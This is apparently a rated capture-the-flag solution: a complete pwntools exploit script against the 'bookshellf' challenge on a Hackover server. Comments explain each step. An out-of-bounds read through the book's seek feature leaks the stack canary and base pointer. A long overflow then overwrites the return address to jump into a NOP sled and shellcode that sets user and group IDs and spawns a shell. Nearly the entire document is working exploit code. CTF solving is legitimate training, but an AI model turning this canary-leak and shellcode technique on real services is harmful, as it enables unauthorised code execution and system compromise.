Rating: 5.0
from pwn import *
context.os = 'linux'
context.arch = "amd64"
#r = process("./bookshellf")
r = remote("challenges.hackover.h4q.it", 31337)
# using the book 'seek' function we can read past the array boundary and leak memory
# we can leak the stack canary and rbp, then produce an overflow and overwrite rip while pointing to our shellcode (NX is not set)
## Get stack canary
r.sendline("1")
r.recvuntil(">")
r.clean()
r.sendline("memory.txt")
r.recvuntil("continue?")
r.sendline("s30729") # last byte of stack canary is a null byte (probably ubuntu: http://phrack.org/issues/67/13.html)
r.recvuntil("more love!\n\n\n")
canary = u64("\x00"+r.recvn(7))
log.info("Got the stack canary: 0x%x" % canary)
r.sendline("n")
r.recvuntil(">")
r.clean()
## Get rbp
r.sendline("1")
r.recvuntil(">")
r.clean()
r.sendline("memory.txt")
r.recvuntil("continue?")
r.sendline("s30736")
r.recvuntil("more love!\n\n\n")
getrbp = r.recvn(6)
assert getrbp[5] == "\x7f"
rbp = u64(getrbp + "\x00\x00")
log.info("rbp is at 0x%x" % rbp)
r.sendline("n")
r.recvuntil(">")
r.clean()
## Smash it!
r.sendline("1")
r.recvuntil(">")
r.clean()
r.sendline("A"*31304 + p64(canary) + p64(rbp) + p64(rbp+32) + "\x90"*100 + asm(shellcraft.setresuid(1001,1001,1001) + shellcraft.setresgid(1001,1001,1001) + shellcraft.sh()))
r.interactive()
